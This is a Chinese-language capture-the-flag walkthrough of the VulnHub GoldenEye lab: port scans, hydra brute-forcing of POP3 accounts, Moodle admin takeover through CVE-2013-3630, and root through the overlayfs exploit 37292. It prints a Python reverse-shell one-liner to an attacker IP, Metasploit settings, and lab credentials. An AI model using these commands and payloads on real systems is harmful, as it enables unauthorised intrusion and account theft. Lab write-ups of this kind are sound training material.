vulnhub_goldeneye

概述

1. 信息收集获取moodle的admin密码
2. moodle admin权限下，通过CVE-2013-3630 getshell
3. CVE-2015-1328本地提权

信息收集

获取靶机IP

nmap -sP 192.168.56.0/24

Nmap scan report for 192.168.56.103
Host is up (0.40s latency).

端口服务扫描

全端口扫描、获取所有信息

nmap -p- 192.168.56.103

PORT      STATE SERVICE
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown


nmap -sS -sV -T5 -p25,53,80,55006,55007 192.168.56.103

PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
53/tcp    open  domain   dnsmasq 2.81
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open  ssl/pop3 Dovecot pop3d
55007/tcp open  pop3     Dovecot pop3d

80端口

进入/sev-home路径

查看网页源码

打开terminal.js

//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes

翻译：
//Boris，确保更新默认密码。
//我的消息来源说军情六处可能计划渗透。
//警惕任何可疑的网络流量。。。。
//
//我给你编码p@ssword在下面
//
//
//顺便说一句，Natalya说她可以破解你的密码

html-decode

获取信息

name:
  Boris
  Natalya
pwd:
  InvincibleHack3r

认证通过/sev-home

​ 根据提示信息，成功通过/sev-home。

登录成功的信息为：

​ boris/InvincibleHack3r

<h1>GoldenEye</h1>
<p>GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO) </p>
<p>Please email a qualified GNO supervisor to receive the online <b>GoldenEye Operators Training</b> to become an Administrator of the GoldenEye system</p>
<p>Remember, since <b><i>security by obscurity</i></b> is very effective, we have configured our pop3 service to run on a very high non-default port</p>
</div>
<h1>黄金眼</h1>
<p>GoldenEye是一个高度机密的苏联原始武器项目。由于您有访问权限，您肯定持有绝密许可证，并有资格成为认证的GoldenEye网络运营商（GNO）</p>
<p>请向合格的GNO主管发送电子邮件，接受在线GoldenEye操作员培训，成为GoldenEye系统管理员</p>
<p>请记住，由于模糊安全非常有效，我们已将pop3服务配置为在非常高的非默认端口上运行</p>
</div>

55006与55007端口

​ 通过nmap扫描这两个端口开启的服务的详细信息。

┌──(kali㉿Kali)-[~]
└─$ nmap -p55006,55007 -sV -A -T4 192.168.56.103
Nmap scan report for 192.168.56.103
Host is up (0.34s latency).

PORT      STATE SERVICE  VERSION
55006/tcp open  ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
55007/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE USER SASL(PLAIN) PIPELINING RESP-CODES UIDL CAPA TOP STLS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.45 seconds

​ 通过探测的结果可以知道，这两个端口开放了pop3的mail服务，根据提示信息，在mail服务中，可能存在Boris未修改默认密码。

Hydra暴力破解pop3服务

​ 根据提示信息，搜集到的用户名字典为：

boris
natalya

hydra -L name.txt -P /usr/share/wordlists/fasttrack.txt 192.168.56.103 -s 55007 pop3

[55007][pop3] host: 192.168.56.103   login: boris   password: secret1!
[55007][pop3] host: 192.168.56.103   login: natalya   password: bird

1 of 1 target successfully completed, 2 valid passwords found

​ 通过hydra进行爆破，得到了两个账号的密码，接下来通过对其进行信息收集。通过nc对

boris账号

nc 192.168.56.103 55007
+OK GoldenEye POP3 Electronic-Mail System

user boris
+OK
pass secret1!
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921
.
retr 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
retr 2  
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
retr 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id 4B9F4454B1
        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

.

翻译：

From: root@127.0.0.1.goldeneye
鲍里斯，这是管理员。 您可以在此处与同事和学生进行电子交流。 我不会扫描电子邮件是否存在安全风险，因为我相信你和这里的其他管理员。


From: natalya@ubuntu
鲍里斯，我可以破解你的密码！


From: alec@janus.boss
鲍里斯，

您与我们辛迪加的合作将获得丰厚回报。 附件是 GoldenEye 的最终访问代码。 将它们放在此服务器根目录中的隐藏文件中，然后从该电子邮件中删除。 这些访问代码只能有一组，我们需要保护它们以供最终执行。 如果他们被找回并被俘虏，我们的计划将会崩溃和燃烧！

natalya账号

nc 192.168.56.103 55007
use+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.

翻译：

From: root@ubuntu
娜塔莉亚，请你不要再破坏鲍里斯的密码了。 此外，您是 GNO 培训主管。 一旦学生被指定给您，我将通过电子邮件发送给您。
此外，请注意可能的网络漏洞。 我们有情报表明，一个名为 Janus 的犯罪集团正在追捕 GoldenEye。


From: root@ubuntu
好的，娜塔琳，我有一个新学生要给你。 由于这是一个新系统，如果您发现任何配置问题，请让我或鲍里斯知道，尤其是它与安全性有关...即使不是，只需以“安全性”为幌子输入...它会 毫不费力地升级变更单 :)

好的，用户信用是：
用户名：xenia
密码：RCP90rulez！

Boris 验证了她是一个有效的承包商，所以只需创建帐户，好吗？

如果您没有外部内部域的 URL：severnaya-station.com/gnocertdir
**请确保编辑您的主机文件，因为您通常在远程离线工作......

由于您是 Linux 用户，只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。

重要信息提取

username:xenia
password:RCP90rulez！
domain:severnaya-station.com
URL:severnaya-station.com/gnocertdir

访问severnaya-station.com/gnocertdir

修改hosts文件

根据提示信息，首先修改hosts文件，然后访问信息中的URL地址。

登录地址

http://severnaya-station.com/gnocertdir/login/index.php

根据前面得到的账号密码尝试登录。

xenia/RCP90rulez！

邮箱中只存在一封邮件：

邮件信息：
Greetings Xenia,
As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.
My email username is...
doak
Thank you,
Cheers,
Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.

翻译：
问候 Xenia，
作为我们 GoldenEye 培训的新承包商，我欢迎您。 完成您的帐户后，您的仪表板上将显示更多课程。 如果您有任何问题，请通过电子邮件给我发消息，而不是在这里。
我的邮箱用户名是...
多克
谢谢，
干杯，
多克博士“医生”
培训科学家 - 高级培训运营主管
GoldenEye运营中心部门
14 级 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 1,007
电话 555-193-826
手机 555-836-0944
办公室 555-846-9811
个人 555-826-9923
邮箱：doak@
请在打印前回收利用，保持绿色，也就是节省公司的钱！
“有像 Good Grief 这样的东西。问问 Charlie Brown”——someguy
“你错过了 100% 没有投篮的投篮”——韦恩 G.
这是一条安全消息，除非，否则请勿发送。

pop3->爆破用户doak

​ 未获取到其他的信息，信息中能获取到的是一个新的用户名doak，只能回到55007端口尝试使用doak进行爆破。

hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.103:55007

[55007][pop3] host: 192.168.56.103   login: doak   password: goat

doak账号

nc 192.168.56.103 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.

翻译：
詹姆士，
如果您正在阅读本文，那么恭喜您已经走到了这一步。 你知道tradecraft是如何运作的吗？

因为我没有。 访问我们的培训网站并登录我的帐户....挖掘直到您可以泄露更多信息......

​ 根据提示，使用给定的用户名密码继续访问前面给出的website。

dr_doak登录website

登录网站后发现右边有一个s3cret.txt文件，点击后下载。

翻译：
007,

我能够通过 clear txt 捕获这个应用程序 adm1n cr3ds。

GoldenEye 服务器中的大多数 Web 应用程序中的文本都会被扫描，因此我无法在此处添加 cr3dentials。

juicy 的东西在这里：/dir007key/for-007.jpg

您可能也知道，RCP-90 远胜于任何其他武器，而杀戮许可证是唯一的游戏方式。

for-007.jpg

得到有效信息，访问该图片。

http://severnaya-station.com/dir007key/for-007.jpg

图片看起来没什么有用信息，下载下来分析。

wget http://severnaya-station.com/dir007key/for-007.jpg

strings for-007.jpg 
JFIF
Exif
eFdpbnRlcjE5OTV4IQ==
GoldenEye
linux
For James
0231
0100
ASCII
For 007
""""""""""
             !      !!!   !!!!!!!!"""""""""""""""
......          

base64解码：

echo eFdpbnRlcjE5OTV4IQ== | base64 --decode
xWinter1995x!

​ 文本中提到他能通过明文获取admin的密码在这个图片里面，得出这里base64解码的结果是应用中admin的密码。

漏洞利用-CVE-2013-3630

方式一：MSF

​ 识别出cms以及版本后，搜索其版本的漏洞。

​ 搜索出来在Metasploit中有exp可以使用,但多次尝试不成功，后了解到exp中需要执行PSpellshell

Shell engine

​ 在web应用中修改设置：

Home - Site administration - Plugins - Text editors - TinyMCE HTML editor - PSpellShell

msfconsole

msfconsole 
use exploit/multi/http/moodle_spelling_binary_rce
set username admin
set password xWinter1995x!
set rhost severnaya-station.com
set targeturi /gnocertdir
set payload cmd/unix/reverse
set lhost 10.1.1.184
exploit

方式二：手动触发

​ 手动发出同样需要修改Shell engine。

Page to aspell

Home - Site administration - Server - System paths

​ 在此处修改为python反弹shell的代码。

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.1.1.184",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Toggle spellchecher

Home - My profile - Blogs - Add a new entry

​ 点击该按钮触发前面的命令反弹shell。

成功反弹

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ 
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

权限提升

查看内核版本

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU

搜索内核版本的exp

overlayfs本地权限提升

​ overlayfs文件系统是一种叠合式文件系统，实现了在底层文件系统上叠加另一个文件系统。Linux 内核3.18开始已经加入了对overlayfs的支持。Ubuntu Linux内核在更早的版本就已加入该支持。

​ Ubuntu Linux内核的overlayfs文件系统实现中存在一个权限检查漏洞，本地普通用户可以获取管理员权限。此漏洞影响所有目前官方支持的Ubuntu Linux版本，目前已经发布攻击代码，建议受影响用户尽快进行升级。

​ 此漏洞源于overlayfs文件系统在上层文件系统目录中创建新文件时没有正确检查文件权限。它只检查了被修改文件的属主是否有权限在上层文件系统目录写入，导致当从底层文件系统目录中拷贝一个文件到上层文件系统目录时，文件属性也随同拷贝过去。如果Linux内核设置了CONFIG_USER_NS=y和FS_USERNS_MOUNT标志，将允许一个普通用户在低权限用户命名空间中mout一个overlayfs文件系统。本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容，从而提升到管理员权限。

​ 根据信息，直接把文件放在环境，通过运行gcc编译后的文件即可将权限提升为root。

exploits-37292

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ gcc 37292.c -o exp
gcc 37292.c -o exp
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'

​ 由于gcc没有安装，所以这里使用cc进行编译，另外，由于代码中也使用到了gcc，也需要改为cc。

​ 修改好的文件通过msf上传至靶机，然后通过cc进行编译。

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc 37292.c -o exp
cc 37292.c -o exp
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
        if(unshare(CLONE_NEWUSER) != 0)
           ^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                ^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
            waitpid(pid, &status, 0);
            ^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
    wait(NULL);
    ^
5 warnings generated.
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
37292.c        config.php        editor_plugin_src.js  includes
changelog.txt  css               exp                   rpc.php
classes        editor_plugin.js  img
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ./exp
./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# 

cat flag

# cd /root
cd /root
# ls
ls
# ls -la
ls -la
total 44
drwx------  3 root root 4096 Apr 29  2018 .
drwxr-xr-x 22 root root 4096 Apr 24  2018 ..
-rw-r--r--  1 root root   19 May  3  2018 .bash_history
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
drwx------  2 root root 4096 Apr 28  2018 .cache
-rw-------  1 root root  144 Apr 29  2018 .flag.txt
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-------  1 root root 1024 Apr 23  2018 .rnd
-rw-------  1 root root 8296 Apr 29  2018 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here: 

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

# 

进入/006-final/xvf7-flag/

旗帜被捕获
恭喜你*******************************
你抓到密码了！并阻止了亚历克·特雷维良进行他坚不可摧的复仇！！！！
****************************************